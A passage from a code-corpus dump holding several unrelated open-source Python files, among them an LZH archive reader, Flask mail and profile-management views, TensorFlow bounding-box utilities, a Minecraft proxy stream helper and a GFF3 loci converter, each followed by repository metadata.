wA = ''.join(tokens2class(ipa2tokens(w, merge_vowels=False), 'asjp'))
wAA = clean_asjp(wA.replace('0','').replace('I','3').replace('H','N'))
asjp = ''.join([x for x in wAA if x in params['sounds']])
assert len(asjp) > 0
return asjp
def asjp_to_asjp(w, params):
"""
Cleans up the ASJP string and filters it to include the chars specified in
the sounds parameter.
This function is called on ASJP datasets.
"""
w = w.replace('\"','').replace('-','').replace(' ','')
wAA = clean_asjp(w.replace('0','').replace('I','3').replace('H','N'))
asjp = ''.join([x for x in wAA if x in params['sounds']])
assert len(asjp) > 0
return asjp
def is_asjp_data(data):
"""
Expects {lang: {gloss: [transcription,]}}.
Checks whether the translation strings are ASCII.
"""
return all([len(s.encode()) == len(s)
for lang in data.values()
for trans in lang.values()
for s in trans
])
| mit | -1,881,165,960,155,471,600 | 23.223301 | 75 | 0.625251 | false | 2.677039 | false | false | false |
FrodeSolheim/python-lhafile | lhafile/lhafile.py | 1 | 14048 | # -*- coding:utf-8 -*-
# Copyright (c) 2010 Hidekazu Ohnishi.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# * Neither the name of the author nor the names of its contributors
# may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Lhafile, extension extract lzh file.
Its interface is likey zipfile module is include in regular python environment.
"""
from __future__ import unicode_literals
try:
from cStringIO import BytesOrStringIO
except ImportError:
from io import BytesIO as BytesOrStringIO
import datetime
import os
import os.path
import struct
import sys
import lzhlib
crc16 = lzhlib.crc16
if sys.version_info[0] == 3:
string_types = (str,)
def ord(v):
return v
else:
string_types = (basestring,)
def unpack(format, data):
return struct.unpack(str(format), data)
def is_lhafile(filename):
try:
LhaFile(filename)
except:
return False
return True
class BadLhafile(Exception):
pass
class LhaInfo(object):
__slots__ = (
'orig_filename',
'filename',
'directory',
'date_time',
'compress_type',
'comment',
'extra',
'create_system',
'create_version',
'extract_version',
'reserved',
'flag_bits',
'volume',
'internal_attr',
'external_attr',
'header_offset',
'file_offset',
'CRC',
'compress_size',
'file_size',
)
def __init__(self):
self.orig_filename = None
self.filename = None
self.directory = None
self.date_time = None
self.compress_type = None
self.comment = None
self.extra = None
self.create_system = None
self.create_version = None
self.extract_version = None
self.reserved = None
self.flag_bits = None
self.volume = None
self.internal_attr = None
self.external_attr = None
self.header_offset = None
self.file_offset = None
self.CRC = None
self.compress_size = None
self.file_size = None
def __str__(self):
return '%s %s %08X %d %04X' % (self.filename, self.file_size,
self.file_offset, self.compress_size, self.CRC)
def __getstate__(self):
return (self.orig_filename, self.filename, self.directory, self.date_time,
self.compress_type, self.comment, self.extra, self.create_system,
self.create_version, self.extract_version, self.reserved,
self.flag_bits, self.volume, self.internal_attr, self.external_attr,
self.header_offset, self.file_offset, self.CRC, self.compress_size,
self.file_size)
def __setstate__(self, state):
(self.orig_filename, self.filename, self.directory, self.date_time,
self.compress_type, self.comment, self.extra, self.create_system,
self.create_version, self.extract_version, self.reserved,
self.flag_bits, self.volume, self.internal_attr, self.external_attr,
self.header_offset, self.file_offset, self.CRC, self.compress_size,
self.file_size) = state
class LhaFile(object):
"""
"""
SUPPORTED_COMPRESS_TYPE = (b'-lhd-', b'-lh0-', b'-lh5-', b'-lh6-', b'-lh7-')
def __init__(self, file, mode="r", compression=None, callback=None, args=None):
""" Open the LZH file """
self.filelist = []
self.NameToInfo = {}
self.mode = key = mode.replace('b', '')[0]
if isinstance(file, string_types):
self._fileParsed = 0
self.filename = file
modeDict = {'r' : 'rb'}
self.fp = open(file, modeDict[mode])
else:
self._fileParsed = 1
self.fp = file
self.filename = getattr(file, 'name', None)
# Get file size
initial_pos = self.fp.tell()
self.fp.seek(0, 2)
self.filesize = self.fp.tell()
self.fp.seek(initial_pos, 0)
if key == 'r':
self._GetContents(callback=callback,args=args)
else:
if not self._fileParsed:
self.fp.close()
self.fp = None
raise RuntimeError("Mode must be 'r'")
def _GetContents(self, callback=None, args=None):
try:
info = self._RealGetContent()
while info:
if not info.compress_type in Lhafile.SUPPORTED_COMPRESS_TYPE:
raise RuntimeError("Unsupported file is contained %s" % (info.compress_type,))
if callback:
callback(args, self.fp.tell(), self.filesize, info)
self.filelist.append(info)
self.NameToInfo[info.filename] = info
info = self._RealGetContent()
except BadLhafile as e:
raise
if not self._fileParsed:
self.fp.close()
self.fp = None
def _RealGetContent(self):
fp = self.fp
filesize = self.filesize
initial_pos = fp.tell()
is_read = lambda x: fp.tell() + x < filesize
if fp.tell() == filesize - 1:
return None
if not is_read(26):
raise BadLhafile("Header is broken")
# Check OS level
os_level = ord(fp.read(21)[20])
fp.seek(-21, 1)
if not os_level in (0, 1, 2):
raise BadLhafile("this file level is out of support range %d" % os_level)
if os_level in (0, 1):
header_size, checksum, signature, skip_size, \
file_size, modify_time, reserved , os_level, \
filename_length = unpack('<BB5sII4sBBB', fp.read(22))
if is_read(filename_length + 2):
filename, crc = unpack('<%dsH' % filename_length, fp.read(filename_length + 2))
if os_level == 0:
ext_header_size = 0
pass
elif os_level == 1:
extra_data_size = header_size - (5+4+4+2+2+1+1+1+filename_length+2+1+2)
os_identifier, extra_data, ext_header_size \
= unpack('<c%dsH' % extra_data_size, fp.read(1 + extra_data_size + 2))
sum_ext_header_size = 0
directory = None
comment = None
compress_size = skip_size - sum_ext_header_size
elif os_level == 2:
header = fp.read(26)
all_header_size, signature, compress_size, file_size, \
modify_time, reserved, os_level, crc, os_identifier, \
ext_header_size = unpack('<H5sIIIBBHBH', header)
sum_ext_header_size = 0
directory = None
comment = None
while ext_header_size != 0:
sum_ext_header_size += ext_header_size
if not is_read(ext_header_size):
raise BadLhafile("File is broken")
(ext,) = unpack('<B', fp.read(1))
if ext == 0x00:
# Common header
dummy, ext_header_size \
= unpack('<%dsH' % (ext_header_size - 3), fp.read(ext_header_size-1))
elif ext == 0x01:
# Filename header
filename, ext_header_size \
= unpack('<%dsH' % (ext_header_size - 3), fp.read(ext_header_size-1))
elif ext == 0x02:
# Directory name header
directory, ext_header_size \
= unpack('<%dsH' % (ext_header_size - 3), fp.read(ext_header_size-1))
elif ext == 0x3F:
# Comment header
comment, ext_header_size \
= unpack('<%dsH' % (ext_header_size - 3), fp.read(ext_header_size-1))
elif ext == 0x40:
# Attribute Header
if not ext_header_size == 5:
raise BadLhafile("file is broken")
attr, ext_header_size \
= unpack('<HH', fp.read(4))
else:
# Skip the other
dummy, ext_header_size \
= unpack('<%dsH' % (ext_header_size - 3), fp.read(ext_header_size-1))
# skip to next header
file_offset = fp.tell()
if os_level in (0, 1):
compress_size = skip_size - sum_ext_header_size
if not is_read(compress_size):
raise BadLhafile("Compress data is too short")
fp.seek(compress_size, 1)
# modify_time
if os_level in (0, 1):
year = (ord(modify_time[3]) >> 1) + 1980
month = ((ord(modify_time[3]) << 8 | ord(modify_time[2])) >> 5) & 0x0F
day = ord(modify_time[2]) & 0x1F
hour = ord(modify_time[1]) >> 3
minute = ((ord(modify_time[1]) << 8 | ord(modify_time[0])) >> 5) & 0x3F
second = (ord(modify_time[0]) & 0x1F) * 2
#print(os_level, year, month, day, hour, minute, second)
try:
date_time = datetime.datetime(year, month, day, hour, minute, second)
except Exception:
date_time = datetime.datetime(1970, 1, 1)
create_time = date_time
elif os_level in (2,):
dummy_date = datetime.datetime(1970,1,1)
date_time = dummy_date.fromtimestamp(modify_time)
create_time = date_time
info = LhaInfo()
# FIXME: hardcoding ISO-8859-1 is not very nice
filename = filename.decode("ISO-8859-1")
if directory is None:
# for lhaplus archive
#sjisname = unicode(filename, 'cp932')
#if '\\' in sjisname:
# sjispath = [s.encode('cp932') for s in sjisname.split(u'\\')]
# filename = os.sep.join(sjispath)
# directory = os.sep.join(sjispath[:-1])
pass
else:
#print(repr(directory))
# FIXME: hardcoding ISO-8859-1 is not very nice
directory = directory.decode("ISO-8859-1")
directory = os.sep.join(directory.split('\xff'))
filename = os.path.join(directory, filename)
info.directory = directory
info.filename = filename
info.compress_size = compress_size
info.file_size = file_size
info.CRC = crc
info.header_offset = initial_pos
info.file_offset = file_offset
info.external_attr = None
info.internal_attr = None
info.reserved = 0
info.comment = comment
info.compress_type = signature
info.date_time = date_time
if "\x00" in info.filename:
info.filename, info.comment = info.filename.split("\x00")
return info
def lhaname(self):
return self.filename
def namelist(self):
if self.filelist:
return [d.filename for d in self.filelist \
if d.compress_type in Lhafile.SUPPORTED_COMPRESS_TYPE]
return None
def infolist(self):
return self.filelist
def read(self, name):
"""Return file bytes (as a string) for 'name'. """
if not self.fp:
raise RuntimeError("Attempt to read LZH archive that was already closed")
info = self.NameToInfo[name]
if info.compress_type in Lhafile.SUPPORTED_COMPRESS_TYPE:
self.fp.seek(info.file_offset)
fin = BytesOrStringIO(self.fp.read(info.compress_size))
fout = BytesOrStringIO()
try:
session = lzhlib.LZHDecodeSession(fin, fout, info)
while not session.do_next():
pass
outsize = session.output_pos
crc = session.crc16
except Exception as e:
raise e
if outsize != info.file_size:
raise BadLhafile("%s output_size is not matched %d/%d %s" % \
(name, outsize, info.file_size, info.compress_type))
if crc != info.CRC:
raise BadLhafile("crc is not matched")
fout.seek(0)
bytes = fout.read()
elif info.commpress_type == '-lhd-':
raise RuntimeError("name is directory")
else:
raise RuntimeError("Unsupport format")
return bytes
Lhafile = LhaFile
| bsd-3-clause | 9,002,658,663,594,287,000 | 35.865229 | 98 | 0.545202 | false | 3.992043 | false | false | false |
chajadan/dragonfly | dragonfly/engines/base/dictation.py | 5 | 3080 | #
# This file is part of Dragonfly.
# (c) Copyright 2007, 2008 by Christo Butcher
# Licensed under the LGPL.
#
# Dragonfly is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Dragonfly is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with Dragonfly. If not, see
# <http://www.gnu.org/licenses/>.
#
"""
Dictation container base class
============================================================================
This class is used to store the recognized results of dictation elements
within voice-commands. It offers access to both the raw spoken-form words
and be formatted written-form text.
The formatted text can be retrieved using
:meth:`~DictationContainerBase.format` or simply by calling ``str(...)``
on a dictation container object. A tuple of the raw spoken words can be
retrieved using :attr:`~DictationContainerBase.words`.
"""
#---------------------------------------------------------------------------
# Dictation base class -- base class for SR engine-specific containers
# of dictated words.
class DictationContainerBase(object):
"""
Container class for dictated words as recognized by the
:class:`Dictation` element.
This base class implements the general functionality of dictation
container classes. Each supported engine should have a derived
dictation container class which performs the actual engine-
specific formatting of dictated text.
"""
def __init__(self, words):
"""
A dictation container is created by passing it a sequence
of words as recognized by the backend SR engine.
Each word must be a Unicode string.
:param words: A sequence of Unicode strings.
:type words: sequence-of-unicode
"""
self._words = tuple(words)
self._formatted = None
def __str__(self):
return unicode(self).encode("windows-1252")
def __unicode__(self):
if self._formatted is None:
self._formatted = self.format()
return self._formatted
def __repr__(self):
message = u"%s(%s)" % (self.__class__.__name__,
u", ".join(self._words))
return message.encode("windows-1252")
@property
def words(self):
""" Sequence of the words forming this dictation. """
return self._words
def format(self):
""" Format and return this dictation as a Unicode object. """
return u" ".join(self._words)
| lgpl-3.0 | -4,009,291,875,308,011,000 | 33.790698 | 76 | 0.612411 | false | 4.422414 | false | false | false |
ariestiyansyah/atlas | users/utilities/helpers.py | 2 | 1942 | # coding=utf-8
"""Helper methods."""
from threading import Thread
from flask import jsonify
from werkzeug.exceptions import HTTPException
from flask_mail import Message
from users import mail, APP
def make_json_error(ex):
"""Return errors as json.
See http://flask.pocoo.org/snippets/83/
:param ex: An exception.
:return: HttpResponse
"""
response = jsonify(message=str(ex))
response.status_code = (
ex.code
if isinstance(ex, HTTPException)
else 500)
return response
def send_mail(sender, recipients, subject, text_body, html_body):
"""To send a single email from sender to receiver synchronously
:param sender: Sender of the email.
:type sender: str
:param recipients: Recipients email address.
:type recipients: list
:param subject: Subject of the email.
:type subject: str
:param text_body: Text of the body.
:type text_body: str
:param html_body: HTML of the body.
:type html_body: str
"""
# Get mail server configuration
message = Message(subject=subject, sender=sender, recipients=recipients)
message.body = text_body
message.html = html_body
with APP.app_context():
mail.send(message)
def send_async_mail(sender, recipients, subject, text_body, html_body):
"""To send email asynchronously
:param sender: Sender of the email.
:type sender: str
:param recipients: Recipients email address.
:type recipients: list
:param subject: Subject of the email.
:type subject: str
:param text_body: Text of the body.
:type text_body: str
:param html_body: HTML of the body.
:type html_body: str
:return sender_thread: The thread for sending the email.
:rtype: Thread
"""
sender_thread = Thread(
target=send_mail,
args=[sender, recipients, subject, text_body, html_body]
)
sender_thread.start()
return sender_thread
| gpl-2.0 | -4,620,640,378,158,892,000 | 26.742857 | 76 | 0.670958 | false | 3.915323 | false | false | false |
goldblade/CobemApp | app/modules/adm/controllers/perfil.py | 1 | 3226 | # -*- coding: utf-8 -*-
from flask import render_template, request, redirect, url_for, flash
from . import mod
from flask.ext.login import login_required
from flask.ext import login
from app.models import paginate
from app.modules.adm.models.usuario import Perfil
from app.modules.adm.forms.perfil import PerfilForm
from flask.ext.wtf import Form
from app import db
@mod.route('/perfil', defaults={'page' : 1})
@mod.route('/perfil/listar')
@mod.route('/perfil/listar/<int:page>')
@login_required
def perfil_listar_view(page):
perfis = Perfil.query.order_by('nome ASC').all()
res = paginate(perfis, page, Perfil, 8)
return render_template('adm/perfil/listar.html', active_page='adm', user=login.current_user, **res)
@mod.route('/perfil/adicionar', methods=["GET", "POST"])
@login_required
def perfil_adicionar_view():
form = PerfilForm(request.form)
if request.method == 'POST' and form.validate():
p = Perfil()
p.nome = form.nome.data
p.ativo = form.ativo.data
try:
db.session.add(p)
db.session.commit()
except:
flash(u'Não foi possível inserir o perfil', 'danger')
flash(u'Perfil inserido com sucesso!', 'success')
return redirect(url_for('.perfil_listar_view'))
return render_template('adm/perfil/adicionar.html', active_page='adm', user=login.current_user, form=form)
@mod.route('/perfil/editar/id/<int:id>', methods=["GET", "POST"])
@login_required
def perfil_editar_view(id):
try:
p = Perfil.query.get(id)
except:
flash(u'Perfil não encontrado', 'danger')
return redirect(url_for('.perfil_listar_view'))
form = PerfilForm(request.form, obj=p)
if request.method == 'POST' and form.validate():
p.nome = form.nome.data
p.ativo = form.ativo.data
try:
db.session.add(p)
db.session.commit()
except:
flash(u'Não foi possível alterar o perfil', 'danger')
flash(u'Perfil foi alterado com sucesso!', 'success')
return redirect(url_for('.perfil_listar_view'))
return render_template('adm/perfil/editar.html', active_page='adm', user=login.current_user, form=form)
@mod.route('/perfil/deletar/id/<int:id>', methods=["GET"])
@login_required
def perfil_deletar_view(id):
try:
p = Perfil.query.get(id)
db.session.delete(p)
db.session.commit()
flash(u'Registro removido com sucesso', 'success')
except:
flash(u'Registro não encontrado no sistema', 'danger')
return redirect(url_for('.perfil_listar_view'))
@mod.route('/perfil/exibir/id/<int:id>', methods=["GET"])
@login_required
def perfil_exibir_view(id):
try:
p = Perfil.query.get(id)
except:
flash(u'Perfil não encontrado!', 'danger')
return redirect(url_for('.perfil_listar_view'))
return render_template('adm/perfil/exibir.html', active_page='adm', user=login.current_user, data=p)
@mod.route('/perfil/pesquisar', methods=["POST"])
@login_required
def perfil_pesquisar_view():
q = request.form['q']
if request.method == 'POST':
if q != '':
busca_perfil = Perfil.query.filter(Perfil.nome.like('%' + q + '%')).all()
else:
busca_perfil = Perfil.query.order_by('nome ASC').all()
return render_template('adm/perfil/pesquisar.html', dados=busca_perfil) | gpl-2.0 | 5,153,285,524,558,392,000 | 32.265957 | 108 | 0.678161 | false | 2.705042 | false | false | false |
tryolabs/luminoth | luminoth/utils/bbox_transform_tf.py | 1 | 4791 | import tensorflow as tf
def get_width_upright(bboxes):
with tf.name_scope('BoundingBoxTransform/get_width_upright'):
bboxes = tf.cast(bboxes, tf.float32)
x1, y1, x2, y2 = tf.split(bboxes, 4, axis=1)
width = x2 - x1 + 1.
height = y2 - y1 + 1.
# Calculate up right point of bbox (urx = up right x)
urx = x1 + .5 * width
ury = y1 + .5 * height
return width, height, urx, ury
def encode(bboxes, gt_boxes, variances=None):
with tf.name_scope('BoundingBoxTransform/encode'):
(bboxes_width, bboxes_height,
bboxes_urx, bboxes_ury) = get_width_upright(bboxes)
(gt_boxes_width, gt_boxes_height,
gt_boxes_urx, gt_boxes_ury) = get_width_upright(gt_boxes)
if variances is None:
variances = [1., 1.]
targets_dx = (gt_boxes_urx - bboxes_urx)/(bboxes_width * variances[0])
targets_dy = (gt_boxes_ury - bboxes_ury)/(bboxes_height * variances[0])
targets_dw = tf.log(gt_boxes_width / bboxes_width) / variances[1]
targets_dh = tf.log(gt_boxes_height / bboxes_height) / variances[1]
targets = tf.concat(
[targets_dx, targets_dy, targets_dw, targets_dh], axis=1)
return targets
def decode(roi, deltas, variances=None):
with tf.name_scope('BoundingBoxTransform/decode'):
(roi_width, roi_height,
roi_urx, roi_ury) = get_width_upright(roi)
dx, dy, dw, dh = tf.split(deltas, 4, axis=1)
if variances is None:
variances = [1., 1.]
pred_ur_x = dx * roi_width * variances[0] + roi_urx
pred_ur_y = dy * roi_height * variances[0] + roi_ury
pred_w = tf.exp(dw * variances[1]) * roi_width
pred_h = tf.exp(dh * variances[1]) * roi_height
bbox_x1 = pred_ur_x - 0.5 * pred_w
bbox_y1 = pred_ur_y - 0.5 * pred_h
# This -1. extra is different from reference implementation.
bbox_x2 = pred_ur_x + 0.5 * pred_w - 1.
bbox_y2 = pred_ur_y + 0.5 * pred_h - 1.
bboxes = tf.concat(
[bbox_x1, bbox_y1, bbox_x2, bbox_y2], axis=1)
return bboxes
def clip_boxes(bboxes, imshape):
"""
Clips bounding boxes to image boundaries based on image shape.
Args:
bboxes: Tensor with shape (num_bboxes, 4)
where point order is x1, y1, x2, y2.
imshape: Tensor with shape (2, )
where the first value is height and the next is width.
Returns
Tensor with same shape as bboxes but making sure that none
of the bboxes are outside the image.
"""
with tf.name_scope('BoundingBoxTransform/clip_bboxes'):
bboxes = tf.cast(bboxes, dtype=tf.float32)
imshape = tf.cast(imshape, dtype=tf.float32)
x1, y1, x2, y2 = tf.split(bboxes, 4, axis=1)
width = imshape[1]
height = imshape[0]
x1 = tf.maximum(tf.minimum(x1, width - 1.0), 0.0)
x2 = tf.maximum(tf.minimum(x2, width - 1.0), 0.0)
y1 = tf.maximum(tf.minimum(y1, height - 1.0), 0.0)
y2 = tf.maximum(tf.minimum(y2, height - 1.0), 0.0)
bboxes = tf.concat([x1, y1, x2, y2], axis=1)
return bboxes
def change_order(bboxes):
"""Change bounding box encoding order.
TensorFlow works with the (y_min, x_min, y_max, x_max) order while we work
with the (x_min, y_min, x_max, y_min).
While both encoding options have its advantages and disadvantages we
decided to use the (x_min, y_min, x_max, y_min), forcing use to switch to
TensorFlow's every time we want to use a std function that handles bounding
boxes.
Args:
bboxes: A Tensor of shape (total_bboxes, 4)
Returns:
bboxes: A Tensor of shape (total_bboxes, 4) with the order swaped.
"""
with tf.name_scope('BoundingBoxTransform/change_order'):
first_min, second_min, first_max, second_max = tf.unstack(
bboxes, axis=1
)
bboxes = tf.stack(
[second_min, first_min, second_max, first_max], axis=1
)
return bboxes
if __name__ == '__main__':
import numpy as np
bboxes = tf.placeholder(tf.float32)
bboxes_val = [[10, 10, 20, 22]]
gt_boxes = tf.placeholder(tf.float32)
gt_boxes_val = [[11, 13, 34, 31]]
imshape = tf.placeholder(tf.int32)
imshape_val = (100, 100)
deltas = encode(bboxes, gt_boxes)
decoded_bboxes = decode(bboxes, deltas)
final_decoded_bboxes = clip_boxes(decoded_bboxes, imshape)
with tf.Session() as sess:
final_decoded_bboxes = sess.run(final_decoded_bboxes, feed_dict={
bboxes: bboxes_val,
gt_boxes: gt_boxes_val,
imshape: imshape_val,
})
assert np.all(gt_boxes_val == final_decoded_bboxes)
| bsd-3-clause | 302,808,356,167,152,300 | 30.519737 | 79 | 0.591943 | false | 3.096962 | false | false | false |
uber-common/opentracing-python-instrumentation | opentracing_instrumentation/utils.py | 1 | 1743 | # Copyright (c) 2015 Uber Technologies, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from __future__ import absolute_import
import opentracing
def start_child_span(operation_name, tracer=None, parent=None, tags=None):
"""
Start a new span as a child of parent_span. If parent_span is None,
start a new root span.
:param operation_name: operation name
:param tracer: Tracer or None (defaults to opentracing.tracer)
:param parent: parent Span or None
:param tags: optional tags
:return: new span
"""
tracer = tracer or opentracing.tracer
return tracer.start_span(
operation_name=operation_name,
child_of=parent.context if parent else None,
tags=tags
)
| mit | 4,675,019,730,161,642,000 | 41.512195 | 79 | 0.743546 | false | 4.240876 | false | false | false |
sadimusi/mc4p | mc4p/util.py | 2 | 3264 | # -*- coding: utf-8 -*-
# This source file is part of mc4p,
# the Minecraft Portable Protocol-Parsing Proxy.
#
# Copyright (C) 2011 Matthew J. McGill, Simon Marti
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License v2 as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import os.path, logging, logging.config
class PartialPacketException(Exception):
"""Thrown during parsing when not a complete packet is not available."""
pass
class Stream(object):
"""Represent a stream of bytes."""
def __init__(self):
"""Initialize the stream."""
self.buf = ""
self.i = 0
self.tot_bytes = 0
self.wasted_bytes = 0
def append(self,str):
"""Append a string to the stream."""
self.buf += str
def read(self,n):
"""Read n bytes, returned as a string."""
if self.i + n > len(self.buf):
self.wasted_bytes += self.i
self.i = 0
raise PartialPacketException()
str = self.buf[self.i:self.i+n]
self.i += n
return str
def reset(self):
self.i = 0
def packet_finished(self):
"""Mark the completion of a packet, and return its bytes as a string."""
# Discard all data that was read for the previous packet,
# and reset i.
data = ""
if self.i > 0:
data = self.buf[:self.i]
self.buf = self.buf[self.i:]
self.tot_bytes += self.i
self.i = 0
return data
def __len__(self):
return len(self.buf) - self.i
def write_default_logging_file(lpath):
"""Write a default logging.conf."""
contents="""
[loggers]
keys=root,mc4p,plugins,parsing
[handlers]
keys=consoleHdlr
[formatters]
keys=defaultFormatter
[logger_root]
level=WARN
handlers=consoleHdlr
[logger_mc4p]
handlers=
qualname=mc4p
[logger_plugins]
handlers=
qualname=plugins
[logger_parsing]
handlers=
qualname=parsing
[handler_consoleHdlr]
class=StreamHandler
formatter=defaultFormatter
args=(sys.stdout,)
[formatter_defaultFormatter]
format=%(levelname)s|%(asctime)s|%(name)s - %(message)s
datefmt=%H:%M:%S
"""
f=None
try:
f=open(lpath,"w")
f.write(contents)
finally:
if f: f.close()
logging_configured = False
def config_logging(logfile=None):
"""Configure logging. Can safely be called multiple times."""
global logging_configured
if not logging_configured:
dir = os.path.dirname(os.path.abspath(__file__))
if not logfile:
logfile = os.path.join(dir, 'logging.conf')
if not os.path.exists(logfile):
write_default_logging_file(logfile)
logging.config.fileConfig(logfile)
logging_configured = True
| gpl-2.0 | 2,994,194,222,830,003,000 | 24.700787 | 80 | 0.643382 | false | 3.688136 | true | false | false |
CCI-Tools/ect-core | cate/util/sround.py | 2 | 1479 | from typing import Tuple
import math
# max number of significant digits for a 64-bit float
_MAX_SIGNIFICANT_DIGITS_AFTER_DOT = 15
_MIN_EXP = -323
_MAX_EXP = 308
def sround(value: float, ndigits: int = 0, int_part=False) -> float:
"""
Round *value* to significant number of digits *ndigits*.
:param value: The value to round.
:param ndigits: The number of digits after the first significant digit.
:param int_part:
:return:
"""
ndigits_extra = _ndigits_extra(value, int_part=int_part)
ndigits += ndigits_extra
return round(value, ndigits=ndigits)
def sround_range(range_value: Tuple[float, float], ndigits: int = 0, int_part=False) -> Tuple[float, float]:
value_1, value_2 = range_value
ndigits_extra_1 = _ndigits_extra(value_1, int_part=int_part)
ndigits_extra_2 = _ndigits_extra(value_2, int_part=int_part)
ndigits += min(ndigits_extra_1, ndigits_extra_2)
return round(value_1, ndigits=ndigits), round(value_2, ndigits=ndigits)
def _ndigits_extra(value: float, int_part: bool) -> int:
ndigits = -int(math.floor(_limited_log10(value)))
if ndigits < 0 and not int_part:
return 0
return ndigits
def _limited_log10(value: float) -> float:
if value > 0.0:
exp = math.log10(value)
elif value < 0.0:
exp = math.log10(-value)
else:
return _MIN_EXP
if exp < _MIN_EXP:
return _MIN_EXP
if exp > _MAX_EXP:
return _MAX_EXP
return exp
| mit | -1,770,504,944,185,274,000 | 26.90566 | 108 | 0.648411 | false | 3.087683 | false | false | false |
janinamass/gardening | Scythe/src/Tools/Scythe_gff2loc.py | 1 | 2365 | #!/usr/bin/python
import re,sys, getopt
#####################################
# last update 03/31/2013 by J. Mass #
# version = '0.1' #
#####################################
def usage():
print ("""
##############################
# Scythe_gff2loc.py v0.1 #
##############################
-f, --file=gff3_FILE (tested w/ _gene.gff3 from phytozome)
-o, --output=FILE output file [default: gff3_FILE.loc]
-h, --help prints this
""")
sys.exit(2)
def read_gff2loc(infile, outfile):
infile = open(infile, 'r')
outfile = open(outfile, 'w')
loci = {}
longest = {}
rawstr = r"""(Name=)(.*);pacid.*(longest=)(.*);(Parent=)(.*)"""
cnt = 0
for ln in infile:
s =ln
m = re.findall(rawstr, s)
if len(m) >0:
name = m[0][1]
isLongest = m[0][3]
parent = m[0][5]
if isLongest == str(1):
if parent in longest:
print("#Warning "+parent+" has more than one default model\nCheck your gff -> ", longest[parent], name)
longest[parent]=name #longest will be printed to 2nd col
elif isLongest == str(0):
if parent in loci:
loci[parent].append(name)
else:
loci[parent]=[name]
s_def = sorted(longest.keys())
for k_def in s_def:
try:
outfile.write(k_def+"\t"+longest[k_def]+"\t"+"\t".join(loci[k_def])+"\n")
except KeyError as ke:
outfile.write(k_def+"\t"+longest[k_def]+"\n")
if k_def in loci:
del loci[k_def]
s = sorted(loci.keys())
for k in s:
try:
outfile.write(k+"\t"+longest[k]+"\t"+"\t".join(loci[k])+"\n")
except KeyError as ke:
print("#Warning "+k+" has no default model\n")
outfile.write(k+"\t"+"\t".join(loci[k])+"\n")
return loci
###################################
outfile = None
infile = None
###################################
try:
opts, args = getopt.gnu_getopt(sys.argv[1:], "f:ho:", ["file=","help", "output="])
except getopt.GetoptError as err:
print (str(err))
usage()
for o, a in opts:
if o in ("-f", "--file"):
infile=a
elif o in ("-h", "--help"):
usage()
elif o in ("-o", "--output"):
outfile = a
else:
assert False, "unhandled option"
########################################
if infile is None:
usage()
if outfile is None:
outfile = infile+".loc"
########################################
read_gff2loc(infile, outfile)
| gpl-3.0 | 4,433,694,549,720,110,000 | 26.183908 | 108 | 0.49556 | false | 2.997465 | false | false | false |
etuna-SBF-kog/Stadsparken | env/lib/python2.7/site-packages/mustachejs/tests/utils.py | 4 | 1294 | """
Testing utilities backported from recent Django versions, for testing with
older Django versions.
"""
from __future__ import with_statement
from django.conf import settings, UserSettingsHolder
from django.utils.functional import wraps
class override_settings(object):
"""
Acts as either a decorator, or a context manager. If it's a decorator it
takes a function and returns a wrapped function. If it's a contextmanager
it's used with the ``with`` statement. In either event entering/exiting
are called before and after, respectively, the function/block is executed.
"""
def __init__(self, **kwargs):
self.options = kwargs
self.wrapped = settings._wrapped
def __enter__(self):
self.enable()
